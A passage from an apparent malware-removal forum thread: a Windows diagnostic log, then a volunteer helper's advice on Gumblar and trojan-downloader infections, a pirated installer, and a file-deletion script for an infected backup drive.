"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=36
"NoDriveAutoRun"=FFFFFFFF
"NoDrives"=0

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"HonorAutoRunSetting"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Google\Google Talk\googletalk.exe"="C:\Program Files\Google\Google Talk\googletalk.exe:*:Enabled:Google Talk"
"C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe"="C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe:*:Enabled:SMC Service"
"C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE"="C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE:*:Enabled:SNAC Service"
"C:\Program Files\Common Files\Symantec Shared\ccApp.exe"="C:\Program Files\Common Files\Symantec Shared\ccApp.exe:*:Enabled:Symantec Email"
"C:\Program Files\Windows Live\Messenger\wlcsdk.exe"="C:\Program Files\Windows Live\Messenger\wlcsdk.exe:*:Enabled:Windows Live Call"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"
"C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe"="C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe:*:Enabled:Adobe CSI CS4"
"C:\Program Files\Bonjour\mDNSResponder.exe"="C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour"
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
"C:\Program Files\Microsoft Office\Office12\GROOVE.EXE"="C:\Program Files\Microsoft Office\Office12\GROOVE.EXE:*:Enabled:Microsoft Office Groove"
"C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE"="C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE:*:Enabled:Microsoft Office OneNote"
"C:\Program Files\iTunes\iTunes.exe"="C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Windows Live\Messenger\wlcsdk.exe"="C:\Program Files\Windows Live\Messenger\wlcsdk.exe:*:Enabled:Windows Live Call"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"

======File associations======

.js - edit - "C:\Program Files\Macromedia\Dreamweaver 8\dreamweaver.exe" "%1"

======List of files/folders created in the last 1 months======

2009-08-05 15:03:42 ----D---- C:\Program Files\Winamp
2009-08-05 15:03:42 ----D---- C:\Documents and Settings\me\Application Data\Winamp
2009-08-05 11:29:18 ----D---- C:\WINDOWS\LastGood
2009-08-05 10:09:35 ----RASHD---- C:\autorun.inf
2009-08-05 09:17:53 ----D---- C:\Documents and Settings\All Users\Application Data\Corel
2009-08-05 09:14:05 ----D---- C:\Program Files\Common Files\Corel
2009-08-05 09:12:09 ----D---- C:\Program Files\Corel
2009-08-04 18:33:39 ----D---- C:\Program Files\ERUNT
2009-08-04 18:01:07 ----D---- C:\HostsXpert
2009-08-04 00:03:14 ----A---- C:\WINDOWS\system32\javaws.exe
2009-08-04 00:03:14 ----A---- C:\WINDOWS\system32\javaw.exe
2009-08-04 00:03:13 ----A---- C:\WINDOWS\system32\java.exe
2009-08-04 00:02:47 ----D---- C:\Program Files\Java
2009-07-31 18:25:21 ----D---- C:\_OTM
2009-07-30 18:43:16 ----D---- C:\Documents and Settings\me\Application Data\Teleca
2009-07-30 18:34:07 ----D---- C:\Documents and Settings\me\Application Data\Sony Ericsson
2009-07-30 18:33:17 ----D---- C:\Program Files\Intuwave
2009-07-30 18:33:07 ----D---- C:\Program Files\Symbian
2009-07-30 18:31:22 ----D---- C:\Program Files\Common Files\Sony Ericsson Shared
2009-07-30 18:31:22 ----D---- C:\Documents and Settings\All Users\Application Data\Sony Ericsson
2009-07-30 18:30:38 ----D---- C:\Program Files\Common Files\Teleca Shared
2009-07-30 18:30:32 ----D---- C:\Program Files\Sony Ericsson
2009-07-30 18:30:32 ----D---- C:\Documents and Settings\All Users\Application Data\Teleca
2009-07-28 23:43:09 ----D---- C:\rsit
2009-07-28 00:24:24 ----A---- C:\startup.txt
2009-07-28 00:23:45 ----D---- C:\Program Files\Trend Micro
2009-07-22 14:21:05 ----SD---- C:\ComboFix
2009-07-21 12:45:53 ----D---- C:\Documents and Settings\All Users\Application Data\SUPERAntiSpyware.com
2009-07-21 12:45:40 ----D---- C:\Program Files\SUPERAntiSpyware
2009-07-21 12:45:40 ----D---- C:\Documents and Settings\me\Application Data\SUPERAntiSpyware.com
2009-07-21 12:45:15 ----D---- C:\Program Files\Common Files\Wise Installation Wizard
2009-07-21 12:37:36 ----SHD---- C:\RECYCLER
2009-07-21 12:33:14 ----A---- C:\ComboFix.txt
2009-07-20 17:28:56 ----D---- C:\Documents and Settings\me\Application Data\Malwarebytes
2009-07-20 17:28:49 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
2009-07-20 17:28:49 ----D---- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2009-07-19 12:27:56 ----RHD---- C:\MSOCache
2009-07-19 11:12:33 ----D---- C:\Program Files\Caricature Studio Green 3.6
2009-07-19 11:11:35 ----D---- C:\Documents and Settings\me\Application Data\Carnival Software
2009-07-16 23:30:50 ----HDC---- C:\WINDOWS\$NtUninstallKB973346$
2009-07-16 23:30:40 ----HDC---- C:\WINDOWS\$NtUninstallKB971633$
2009-07-16 23:27:19 ----HDC---- C:\WINDOWS\$NtUninstallKB961371$
2009-07-10 14:17:03 ----D---- C:\Mp3s

======List of files/folders modified in the last 1 months======

2009-08-06 20:17:16 ----D---- C:\WINDOWS\Prefetch
2009-08-06 00:05:52 ----D---- C:\WINDOWS\system32\CatRoot2
2009-08-05 23:33:04 ----D---- C:\WINDOWS\Temp
2009-08-05 15:03:42 ----RD---- C:\Program Files
2009-08-05 12:54:40 ----D---- C:\Downloads
2009-08-05 12:19:00 ----SHD---- C:\WINDOWS\Installer
2009-08-05 12:18:58 ----SHD---- C:\Config.Msi
2009-08-05 11:34:33 ----D---- C:\Documents and Settings\me\Application Data\Download Manager
2009-08-05 11:29:19 ----SD---- C:\WINDOWS\Downloaded Program Files
2009-08-05 11:29:18 ----D---- C:\WINDOWS
2009-08-05 11:28:15 ----D---- C:\WINDOWS\network diagnostic
2009-08-05 10:08:00 ----RASH---- C:\boot.ini
2009-08-05 10:08:00 ----A---- C:\WINDOWS\win.ini
2009-08-05 10:08:00 ----A---- C:\WINDOWS\system.ini
2009-08-05 10:00:43 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-08-05 09:56:05 ----D---- C:\WINDOWS\ERDNT
2009-08-05 09:15:03 ----RSD---- C:\WINDOWS\Fonts
2009-08-05 09:14:39 ----D---- C:\WINDOWS\WinSxS
2009-08-05 09:14:05 ----D---- C:\Program Files\Common Files
2009-08-04 19:25:27 ----D---- C:\WINDOWS\system32\drivers
2009-08-04 19:14:14 ----D---- C:\WINDOWS\system32
2009-08-04 19:13:20 ----SD---- C:\WINDOWS\Tasks
2009-08-04 00:02:52 ----A---- C:\WINDOWS\system32\deploytk.dll
2009-08-03 14:18:33 ----D---- C:\Documents and Settings\All Users\Application Data\NOS
2009-08-03 14:18:29 ----D---- C:\Program Files\NOS
2009-08-03 14:17:23 ----D---- C:\Program Files\Unlocker
2009-08-03 14:14:10 ----D---- C:\Program Files\TeamViewer
2009-08-03 13:34:35 ----D---- C:\Documents and Settings\All Users\Application Data\Adobe
2009-08-03 13:33:27 ----D---- C:\Program Files\Common Files\Adobe
2009-08-03 13:33:27 ----D---- C:\Program Files\Adobe
2009-08-03 12:08:44 ----D---- C:\Pictures
2009-07-30 18:43:30 ----HD---- C:\WINDOWS\inf
2009-07-30 18:33:17 ----HD---- C:\Program Files\InstallShield Installation Information
2009-07-30 18:30:39 ----D---- C:\Program Files\Common Files\Microsoft Shared
2009-07-30 18:28:15 ----D---- C:\WINDOWS\Downloaded Installations
2009-07-28 12:51:52 ----A---- C:\WINDOWS\ntbtlog.txt
2009-07-28 00:43:12 ----D---- C:\Harsh
2009-07-24 20:49:30 ----D---- C:\Program Files\Mozilla Firefox
2009-07-24 11:58:36 ----D---- C:\RIIMUN
2009-07-22 14:22:13 ----SHD---- C:\System Volume Information
2009-07-22 14:22:13 ----D---- C:\WINDOWS\system32\Restore
2009-07-21 16:14:51 ----D---- C:\WINDOWS\pss
2009-07-21 12:16:32 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
2009-07-20 09:09:41 ----D---- C:\WINDOWS\twain_32
2009-07-20 09:04:30 ----D---- C:\Temp
2009-07-20 08:50:42 ----D---- C:\WINDOWS\system32\NtmsData
2009-07-19 12:36:23 ----D---- C:\Program Files\MSBuild
2009-07-19 12:35:35 ----D---- C:\Program Files\Common Files\DESIGNER
2009-07-19 12:35:23 ----D---- C:\WINDOWS\SHELLNEW
2009-07-19 00:35:05 ----D---- C:\Amrita
2009-07-18 23:37:22 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-07-18 23:27:37 ----SD---- C:\Documents and Settings\me\Application Data\Microsoft
2009-07-16 23:44:20 ----D---- C:\Program Files\Oberon Media
2009-07-16 23:38:30 ----D---- C:\Program Files\Bonjour
2009-07-16 23:30:53 ----A---- C:\WINDOWS\imsins.BAK
2009-07-16 23:30:49 ----HD---- C:\WINDOWS\$hf_mig$
2009-07-16 23:30:46 ----RSHD---- C:\WINDOWS\system32\dllcache
2009-07-10 14:03:12 ----D---- C:\Velocity
2009-07-07 08:10:58 ----A---- C:\WINDOWS\system32\MRT.exe

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 eabfiltr;eabfiltr; C:\WINDOWS\system32\DRIVERS\eabfiltr.sys [2005-09-19 7808]
R1 eeCtrl;Symantec Eraser Control driver; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys []
R1 intelppm;Intel Processor Driver; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-14 36352]
R1 kbdhid;Keyboard HID Driver; C:\WINDOWS\system32\DRIVERS\kbdhid.sys [2008-04-14 14592]
R1 SASDIFSV;SASDIFSV; \??\C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS []
R1 SASKUTIL;SASKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys []
R1 SPBBCDrv;SPBBCDrv; \??\C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys []
R1 SRTSP;SRTSP; C:\WINDOWS\System32\Drivers\SRTSP.SYS [2009-03-04 280112]
R1 SRTSPX;SRTSPX; C:\WINDOWS\System32\Drivers\SRTSPX.SYS [2009-03-04 43824]
R1 SYMTDI;SYMTDI; C:\WINDOWS\System32\Drivers\SYMTDI.SYS [2008-08-21 191536]
R1 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\WINDOWS\system32\DRIVERS\wmiacpi.sys [2008-04-14 8832]
R1 WPS;WPS; \??\C:\WINDOWS\system32\drivers\wpsdrvnt.sys []
R1 WS2IFSL;Windows Socket 2.0 Non-IFS Service Provider Support Environment; C:\WINDOWS\System32\drivers\ws2ifsl.sys [2004-08-05 12032]
R2 adfs;adfs; C:\WINDOWS\system32\drivers\adfs.sys [2008-08-14 74720]
R2 mdmxsdk;mdmxsdk; C:\WINDOWS\system32\DRIVERS\mdmxsdk.sys [2006-02-15 12672]
R3 Arp1394;1394 ARP Client Protocol; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-14 60800]
R3 BTKRNL;Bluetooth Bus Enumerator; C:\WINDOWS\system32\DRIVERS\btkrnl.sys [2006-05-12 1342602]
R3 BTWUSB;WIDCOMM USB Bluetooth Driver; C:\WINDOWS\System32\Drivers\btwusb.sys [2006-05-12 57320]
R3 CmBatt;Microsoft ACPI Control Method Battery Driver; C:\WINDOWS\system32\DRIVERS\CmBatt.sys [2008-04-14 13952]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys []
R3 GEARAspiWDM;GEAR ASPI Filter Driver; C:\WINDOWS\system32\DRIVERS\GEARAspiWDM.sys [2009-03-19 23400]
R3 HBtnKey;HBtnKey; C:\WINDOWS\system32\DRIVERS\cpqbttn.sys [2005-09-19 9344]
R3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\CHDAud.sys [2006-06-02 572928]
R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 HidUsb;Microsoft HID Class Driver; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-14 10368]
R3 HSF_DPV;HSF_DPV; C:\WINDOWS\system32\DRIVERS\HSF_DPV.sys [2006-04-20 995712]
R3 HSFHWAZL;HSFHWAZL; C:\WINDOWS\system32\DRIVERS\HSFHWAZL.sys [2006-04-20 208000]
R3 ialm;ialm; C:\WINDOWS\system32\DRIVERS\ialmnt5.sys [2006-03-23 1166972]
R3 mouhid;Mouse HID Driver; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2001-08-17 12160]
R3 NAVENG;NAVENG; \??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20090804.040\NAVENG.SYS []
R3 NAVEX15;NAVEX15; \??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20090804.040\NAVEX15.SYS []
R3 NIC1394;1394 Net Driver; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-14 61824]
R3 rimmptsk;rimmptsk; C:\WINDOWS\system32\DRIVERS\rimmptsk.sys [2005-11-17 28928]
R3 rimsptsk;rimsptsk; C:\WINDOWS\system32\DRIVERS\rimsptsk.sys [2005-12-22 51840]
R3 rismxdp;Ricoh xD-Picture Card Driver; C:\WINDOWS\system32\DRIVERS\rixdptsk.sys [2005-11-01 308992]
R3 sdbus;sdbus; C:\WINDOWS\system32\DRIVERS\sdbus.sys [2008-04-14 79232]
R3 SymEvent;SymEvent; \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS []
R3 SYMREDRV;SYMREDRV; C:\WINDOWS\System32\Drivers\SYMREDRV.SYS [2008-08-21 27696]
R3 SynTP;Synaptics TouchPad Driver; C:\WINDOWS\system32\DRIVERS\SynTP.sys [2006-06-17 193120]
R3 Teefer2;Teefer2 Miniport; C:\WINDOWS\system32\DRIVERS\teefer2.sys [2008-10-14 49536]
R3 usbehci;Microsoft USB 2.0 Enhanced Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-14 30208]
R3 usbhub;USB2 Enabled Hub; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-14 59520]
R3 USBSTOR;USB Mass Storage Driver; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-14 26368]
R3 usbuhci;Microsoft USB Universal Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-14 20608]
R3 w39n51;Intel(R) PRO/Wireless 3945ABG Adapter Driver; C:\WINDOWS\system32\DRIVERS\w39n51.sys [2006-04-21 1429632]
R3 winachsf;winachsf; C:\WINDOWS\system32\DRIVERS\HSF_CNXT.sys [2006-04-20 727296]
R3 WpsHelper;WpsHelper; \??\C:\WINDOWS\system32\drivers\WpsHelper.sys []
R3 zebrceb;Sony Ericsson Cable Emulation Bus (WDM); C:\WINDOWS\system32\DRIVERS\zebrceb.sys [2007-04-13 62984]
S3 catchme;catchme; \??\C:\DOCUME~1\me\LOCALS~1\Temp\catchme.sys []
S3 COH_Mon;COH_Mon; \??\C:\WINDOWS\system32\Drivers\COH_Mon.sys []
S3 E100B;Intel(R) PRO Network Connection Driver; C:\WINDOWS\system32\DRIVERS\e100b325.sys [2006-04-11 163328]
S3 eabusb;eabusb; C:\WINDOWS\system32\DRIVERS\eabusb.sys [2005-09-19 5760]
S3 HPZid412;IEEE-1284.4 Driver HPZid412; C:\WINDOWS\system32\DRIVERS\HPZid412.sys [2003-04-11 51024]
S3 HPZipr12;Print Class Driver for IEEE-1284.4 HPZipr12; C:\WINDOWS\system32\DRIVERS\HPZipr12.sys [2003-04-11 16080]
S3 HPZius12;USB to IEEE-1284.4 Translation Driver HPZius12; C:\WINDOWS\system32\DRIVERS\HPZius12.sys [2003-04-11 21456]
S3 Profos;Profos; C:\WINDOWS\system32\drivers\Profos.sys []
S3 rtl8139;Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver; C:\WINDOWS\system32\DRIVERS\RTL8139.SYS [2004-08-04 20992]
S3 SASENUM;SASENUM; \??\C:\Program Files\SUPERAntiSpyware\SASENUM.SYS []
S3 sffdisk;SFF Storage Class Driver; C:\WINDOWS\system32\DRIVERS\sffdisk.sys [2008-04-14 11904]
S3 sffp_sd;SFF Storage Protocol Driver for SDBus; C:\WINDOWS\system32\DRIVERS\sffp_sd.sys [2008-04-14 11008]
S3 SRTSPL;SRTSPL; C:\WINDOWS\System32\Drivers\SRTSPL.SYS [2009-03-04 319920]
S3 Trufos;Trufos; C:\WINDOWS\system32\drivers\Trufos.sys []
S3 UIUSys;Conexant Setup API; C:\WINDOWS\system32\DRIVERS\UIUSYS.SYS []
S3 usbccgp;Microsoft USB Generic Parent Driver; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-14 32128]
S3 usbprint;Microsoft USB PRINTER Class; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-14 25856]
S3 usbscan;USB Scanner Driver; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-14 15104]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 zebrbus;Sony Ericsson Composite Device driver; C:\WINDOWS\system32\DRIVERS\zebrbus.sys [2007-04-13 83080]
S3 zebrmdfl;Sony Ericsson Modem Filter; C:\WINDOWS\system32\DRIVERS\zebrmdfl.sys [2007-04-13 15112]
S3 zebrmdm;Sony Ericsson Port (WDM); C:\WINDOWS\system32\DRIVERS\zebrmdm.sys [2007-04-13 108296]
S3 zebrmdmc;Sony Ericsson mRouter Port (WDM); C:\WINDOWS\system32\DRIVERS\zebrmdmc.sys [2007-04-13 108424]
S3 zebrsce;Sony Ericsson PC-Connect Port; C:\WINDOWS\system32\DRIVERS\zebrsce.sys [2007-04-13 90888]
S4 agp440;Intel AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\agp440.sys [2008-04-14 42368]
S4 agpCPQ;Compaq AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\agpCPQ.sys [2008-04-14 44928]
S4 alim1541;ALI AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\alim1541.sys [2008-04-14 42752]
S4 amdagp;AMD AGP Bus Filter Driver; C:\WINDOWS\system32\DRIVERS\amdagp.sys [2008-04-14 43008]
S4 cbidf;cbidf; C:\WINDOWS\system32\DRIVERS\cbidf2k.sys [2001-08-18 13952]
S4 sisagp;SIS AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\sisagp.sys [2008-04-14 40960]
S4 SysPlant;SysPlant for NT; C:\WINDOWS\SYSTEM32\Drivers\SysPlant.sys [2009-05-12 91976]
S4 viaagp;VIA AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\viaagp.sys [2008-04-14 42240]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 btwdins;Bluetooth Service; C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe [2006-05-12 258103]
R2 ccEvtMgr;Symantec Event Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2009-03-17 108392]
R2 ccSetMgr;Symantec Settings Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2009-03-17 108392]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-08-04 152984]
R2 PSI_SVC_2;Protexis Licensing V2; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [2007-07-24 185632]
R2 SmcService;Symantec Management Client; C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe [2009-05-12 1803592]
R2 Symantec AntiVirus;Symantec Endpoint Protection; C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe [2009-05-12 2440632]
R3 iPod Service;iPod Service; C:\Program Files\iPod\bin\iPodService.exe [2009-06-05 541992]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [2008-07-27 72704]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [2004-07-15 32768]
S3 LiveUpdate;LiveUpdate; C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE [2009-03-20 3093880]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
S4 AddFiltr;AddFiltr; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\AddFiltr.exe [2006-06-12 126976]
S4 Apple Mobile Device;Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe [2009-06-05 144712]
S4 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-06-11 655624]
S4 gusvc;Google Software Updater; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2009-06-05 182768]
S4 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
S4 IDriverT;InstallDriver Table Manager; c:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S4 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2006-05-18 49152]
S4 Microsoft Office Groove Audit Service;Microsoft Office Groove Audit Service; C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe [2006-10-27 65824]
S4 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2006-10-26 441136]
S4 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S4 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2003-04-11 65795]
S4 RichVideo;Cyberlink RichVideo Service(CRVS); C:\Program Files\CyberLink\Shared Files\RichVideo.exe [2005-08-08 167936]
S4 SNAC;Symantec Network Access Control; C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE [2009-02-01 320840]
S4 WMPNetworkSvc;Windows Media Player Network Sharing Service; C:\Program Files\Windows Media Player\WMPNetwk.exe [2006-10-18 913408]

-----------------EOF-----------------
hn2009
Active Member
 
Posts: 12
Joined: July 22nd, 2009, 4:59 am

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 6th, 2009, 3:07 pm

Hi :)

Though what I did was to connect my USB Hard Drive and have that scanned using the Kaspersky Online Scanner. So I'm also posting the results for that; although I do have a question regarding it: OTM has moved the infected files as follows - "C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\about.html Infected: Trojan-Downloader.JS.Gumblar.a 1" however I need to use these html files and would like to know how to get rid of the Trojan.
The files in question are irreparably compromised, so no it is not a good idea to move the from the OTM backup as there is no way to disinfect them and if moved back will in turn re-infect your computer.

The files on your USB Hard-Drive are also compromised and I notice you have some illegal software also:

H:\backup\Documents and Settings\me\My Documents\Azureus Downloads\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe Infected: Trojan-Downloader.Win32.Tiny.bxv 1
H:\Downloads\Vector Softwares\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe Infected: Trojan-Downloader.Win32.Tiny.bxv 1
If I may bring you attention to this part of the forum policy:
Any time the helper detects that you may have illegal software on your machine, that helper may stop assisting you immediately until you can demonstrate that you have rectified the situation. We will not support fixing machines with pirated or otherwise illegal software.
Please remove these files from your USB Hard-Drive and in-fact my actual advice would be to remove all all flagged and or format the whole drive.

If however you wish not to format the drive I propose we disinfect the drive in question and you let myself remove all the offending files with a custom OTM script.

Please let myself know your decision about this as otherwise I am wasting my time attempting to clean your system as it will become infected again, thank you.

Next:

I've tried something and would like to know if I'm right... I noticed the following code right before the body tag and deleted it. Did I do the right thing? Will it completely erradicate the problem? Please advise. Thanks.
I can not advise you about this I'm afraid as I only provide Anti-Malware support for home computers, specifically home use operating systems and I am not a computer programmer.
User avatar
Dakeyras
MRU Honors Graduate
MRU Honors Graduate
 
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby hn2009 » August 7th, 2009, 12:26 am

Hey,

Please go ahead and provide a script to remove the softwares in question.

Thanks,
Harsh
hn2009
Active Member
 
Posts: 12
Joined: July 22nd, 2009, 4:59 am

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 7th, 2009, 5:15 am

hn2009 wrote:Hey,

Please go ahead and provide a script to remove the softwares in question.

Thanks,
Harsh
A wise decision :thumbup: I am unavailable for most of today but I will have the next course of action/instructions for your good self by this evening my time GMT.
User avatar
Dakeyras
MRU Honors Graduate
MRU Honors Graduate
 
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Unread postby Dakeyras » August 7th, 2009, 2:38 pm

Hi :)

Flash Disinfector:

  • Please download Flash_Disinfector and save it to your desktop.
  • Double click to run it.
  • You will be prompted to plug in your USB Hard Drive. Plug it in.
  • Flash_Disinfector will start disinfecting your flash and hard drives. This takes a few seconds. Your desktop will disappear in the meantime.
  • When done, a message box will appear. Click OK. Your desktop should now appear. If it doesn't, press Ctrl + Shift + Esc to open Task Manager.
  • Click on File > New Task (Run...). Type in explorer.exe and press Enter. Your desktop should now appear.

Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Leave your USB Hard Drive connected.

Next:

  • Double-click OTM to start the program.
  • Copy the lines from the codebox to the clipboard by highlighting ALL of them and pressing CTRL + B (or, after highlighting, right-click and choose Copy):
Code: Select all
:Files
H:\backup\Velocity Media\Website v2\about.html 
H:\backup\Velocity Media\Website v2\bottom.html 
H:\backup\Velocity Media\Website v2\contact.html 
H:\backup\Velocity Media\Website v2\corpevents.html 
H:\backup\Velocity Media\Website v2\creative.html 
H:\backup\Velocity Media\Website v2\events.html 
H:\backup\Velocity Media\Website v2\gallery.html 
H:\backup\Velocity Media\Website v2\gallery2.html 
H:\backup\Velocity Media\Website v2\marcom.html 
H:\backup\Velocity Media\Website v2\marketing.html 
H:\backup\Velocity Media\Website v2\menu.html 
H:\backup\Velocity Media\Website v2\menu.js 
H:\backup\Velocity Media\Website v2\pbrowser_dom.js 
H:\backup\Velocity Media\Website v2\pbrowser_ie.js 
H:\backup\Velocity Media\Website v2\pbrowser_iemac.js 
H:\backup\Velocity Media\Website v2\pbrowser_opera.js 
H:\backup\Velocity Media\Website v2\pbrowser_safari.js 
H:\backup\Velocity Media\Website v2\portfolio.html 
H:\backup\Velocity Media\Website v2\pr.html 
H:\backup\Velocity Media\Website v2\services.html
H:\backup\Velocity Media\Website v2\swfobject.js 
H:\backup\Velocity Media\Website v2\thankyou.html 
H:\backup\Velocity Media\Website v2\top.html 
H:\backup\Velocity Media\Website v2\validation1.js 
H:\backup\Velocity Media\Website v2\vmenu1.js
H:\backup\Velocity Media\Website v2\_holding.htm 
H:\Data Sorting\Work\Quantum\MSNChecker.exe 
H:\Data Sorting\Work\Quantum\msnchecker1.1.exe 
H:\backup\Velocity Media\Website v3\archive\gallery.html 
H:\backup\Velocity Media\Website v3\archive\swfobject.js 
H:\backup\Velocity Media\Website v3\archive\validation1.js 
H:\backup\Velocity Media\Web Design\Vector Graphics\645 Vector Design Elements.exe 
H:\Downloads\Vector Softwares\CorelDraw X4 inc Keygen0I\CorelDRAWGraphicsSuiteX4Installer_EN.exe 
